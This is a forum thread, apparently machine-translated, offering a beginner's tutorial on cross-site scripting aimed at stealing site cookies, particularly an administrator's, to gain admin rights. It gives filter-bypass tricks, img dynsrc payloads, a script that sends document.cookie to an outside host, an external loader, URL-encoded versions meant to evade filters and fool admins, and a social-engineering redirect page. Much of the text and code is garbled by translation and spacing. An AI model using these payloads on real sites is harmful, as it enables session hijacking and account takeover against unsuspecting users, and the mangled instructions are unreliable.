Forum Thread: Xss for Beginners by [ Mohamed Ahmed ]

In this thread, I want to describe Xss in detail from A to Z. for beginners....
========================== ==============

### Xss is Css => Cross Site Scripting
Not to be confused with CSS is also called XSS
For the first time this bug appeared in 1997.

========== ==============================
### How to use XSS.
First we need to know what a cookie is .?
If you know, you can skip.

Cookieserve to store site credentials on the visitor's computer.

If you registered on the site under the nickname 'hhahahahgs' , the site has saved a file with cookies on your computer, where your data is encoded.

And if you have an administrator and you have access to the site, and I am a user who stole from you (admin) cookies, then I can safely go to the site, and the site defines me as 'admin' - I will have administrator rights.

To change (substitute stolen) cook I advise you to use CookieEdit for IE or built-in functions in Opera and Firefox.
We figured out what cookies are going on ...
To intercept cookies, you need to find a place on the site where you can perform an XSS attack...

### What is an XSS attack?

XSS attacks are attacks not on the site itself, but on users of the site.
XSS is a flaw in the filter of the application.

There Are Passive XSS and Active XSS.

What is Passive XSS?

  • this Xss, which require the victim to participate directly + there are specific limitations and difficulties.

Therefore, passive XSS is not very appreciated.
For example, you need to make it pass through a poisonous link, which will require social engineering, cunning.

waht is Active XSS?


  • this XSS, which does not require any additional action from the victim - it is enough just to open the page with your XSS and the Java code will be executed automatically.

Thanks to their automation - they are very useful and valuable.

For example, active xss exists in BB tags ...because of insufficient filtering, when you leave a message on the forum \ guestbook \ chat, which will always be active with each update.

### So, as found in this XSS website.
As I wrote earlier in this forum that XSS consists of tags, they also consist of html, and javascript =).

  • Javascript can be entered in html.
  • Can be encoded to bypass filters. But more on that later.

How do you know that XSS on a given site is going through?
A horrible frustration of type
<script> alert () </ script>

  • We try to insert this script into all the different fields ... if a message has been output, the script has been processed and executed.

The most common XSS (it is observed in all places where bad filtering):
"> <script> alert () </ script>
The whole point is "> .
Let's think about what we do when we type in the "> <script> alert () </ script> field, what happens?
Wetype some variablein the form "> <script> alert () </ script> "of the field . The variable is being processed,">
<script> alert () </ script>

## This XSS is the most popular in the search engines : We
scan all the fields of the site and try to insert "> <script> alert () </ script>
If the message came out - you found XSS ...

==== =======================================================================

### how to determine there is a filter or not?
Just any field enter: '';! - "<fuck> = & {()}
Then open the html page and look for the word " fuck "
and see the subsequent sivols ..

If <> and then this is the first sign of the vulnerability - hole.

If , "'\the characters remained the same as they were introduced - this is the second sign of the vulnerability - possible additional characters for the subsequent XSS attack.

Then, if you opened HTML, you did not find <> then most likely a hole in the filter.
If you open HTML, you find that <> is replaced with other characters, then this is a bummer - the filter at
least functions normally.
It is also possible to enter the following in the field to check the filtering: "> <> '" `, / \? @%

Consider the case if the filter eats <>

In this case there is a hole probability.
For example, the filter has the condition to eat <script>, <> and.
Then try <zxcvbnzxc792>and look, if you did not eat - found a hole ... then you can create a combat XSS-script.

There is another method of a nested script, for example, like this:
<sc <script> ript> alert () </ sc </ script> ript>
this is if the filter is not very good. strong and poorly filters.

Still it is possible to try in so:

>>>> << script happens, that the filter counts open. and closed. brackets and closes itself. First it filters, then closes ... that gives us a hole to the script injection.

Often happens that the filter supplements the script, for example here it:
http: //***.org/trye.asp? SessionID ="> <IMG% 20SRC = "javascript: alert ();

Filter looks, that nothing is dangerous in <IMG% 20SRC = "javascript: alert ();
executing the script.

Of course, if the filter does not filter different encodings, you can try to encode the script and insert the code.

All you need to try and try and find ...
Try to enter into the fields and carefully review what we got from the filter.
The method of tyke to understand how the filter works, whether it has any flaws.
If the filter is bad, we can always insert scripts.


### Active XSS
You should use allowed tags here and by covering them, you need to execute the query.

For example, tags url, bb, img .

The whole point of insertion is that we need to embed the query into the img or url parity . HaveImg has many parameters except src and alt .

This bug is very often used on the forum, in guestbooks ...

Consider active XSS.

Warnings !!!

The tags fon * t, im * g, ur * l are written with * to ensure that they are not used by this forum.
To use these tags, delete * .

For example, review the forum for the use of tags fon * t, im * g, ur * l and try to insert a script into them or combine them:

im * g httr: // /1.jpg/im*g The cross comes out ... means img is used and we picked it up (it's just that it happens imgis included, and the admins from the creation of the message remove it, they can not insert pictures and it can be used in

different forms). If there is no cross ... and the entire inscription hangs, then try this:
im * g src = httr: // www.

Well, for example, we have achieved a cross with this:
im * g httr: // / im * g

Check if the filter holds a space, add a space after the extension jpg:
im * g httr: /// / im * g
if there is a cross - then everything is OK.

Further there are img parameters dynsrc and lowsrc that hold javascript. We try to insert for example:
im * g dynsrc = javascript: alert () / im * g
check, send - send a message - it means you found the active XSS and instead of alert () you can insert any script.

If the filter does not give up try it like this:
im * g "/ dynsrc =" javascript: alert () "/1.jpg///im*g
im * g http : // "/dynsrc=javascript:alert()/1.jpg/im*g

If you 've got a cross from the above examples, then httr: // is replaced to the address of the sniffer.

There are times when jpg is disabled by the admin.

### We always did type codes like this:
<script> alert ('M0hamEd') </ script>
javascript: alert ('M0hamEd')
javascript: alert ('M0hamEd') / 1.

But they did not bring any benefit, these are just the codes for testing (testing) on ??Xss.

Here's the script:
img = new Image ();
img.src = ""+document.cookie;
</ script>
He already steals cookies =)


### How can I substitute it for a link with Xss?

Yes, it's very easy ...
There are several options:

1) do this:

http: //***.ru/free? P = '> <script> img = new Image (); img.src = " http:[www.gfgghgyg.orgs/HhjNet.gif ? "+ document.cookie;" + document.cookie; </ script>

where ** is the site with Xss.

Here is the compiled script:
'> <script> img = new Image (); img.src = "http: // antichat.

2) You can still do this:

http: //***.ru/free? P = '> <script src = http: //> </ script >
where it refers to

and in js.js is:
img = new Image (); img.src = "http:[ . gif? "+ document.cookie;
this method is more reliable.

But as I already wrote - sometimes there are difficulties with filters on the site (our script does not roll).
Then you need to think about how to get around it.
You can just add something, change something, or delete it in the script.
But there is a more reliable option when we just encode the script. For this, there are many progs.
There is such a site like

Here is an example:

% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% 66% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% 73% 2E% 6A% 73% 3E% 3C% 2F% 73% 63% 72% 69% 70% 74% 3E

it was coded:

http: //***.ru/free? P = '> <script src = http: / /js.js> </ script>

3) Especially encryption is necessary not only to deceive the filters, but also to deceive ADMIN when using PASSIVE CSU.

Here is an example based on social engineering.

We are looking for contact with the forum administrator, we throw him a link to his site in the forum, and he says "so cool feature is on the site" and so far in the same spirit.

And on our site will be as you already guessed =) here is the script:

<script language = "JavaScript">

document.location.href = "% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A % 2A% 2A% 2E% 72% 75% 2F% 66% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72 % 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63 % 72% 69% 70% 74% 2F% 6A% 73% 2E% 6A% 73% 3E% 3C% 2F% 73% 63% 72% 69% 70% 74% 3E "

</ script>

What does the document.location do .href you ask me? )) .. This is Java code, which without a request passes to the specified site. So cho, we get, we gave the link to the admin, and he went to our site, that's what is done .. he quickly throws on

% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% 66% 72% 65% 65% 3F% 70% 3D% 27% 3E % 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74 % 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% 73% 2E% 6A% 73% 3E% 3C% 2F% 73% 63 % 72% 69% 70% 74% 3E

and this already is our Xss in encrypted form.

this will only work when Xss will belong to the site administrator to whom you dropped the link ...

In other words, the DIFFICULTY OF PASSIVE CSU is that the vulnerability can be used ONLY if the victim is AUTHORIZED on a vulnerable site !!!


Be the First to Respond

Share Your Thoughts

  • Hot
  • Active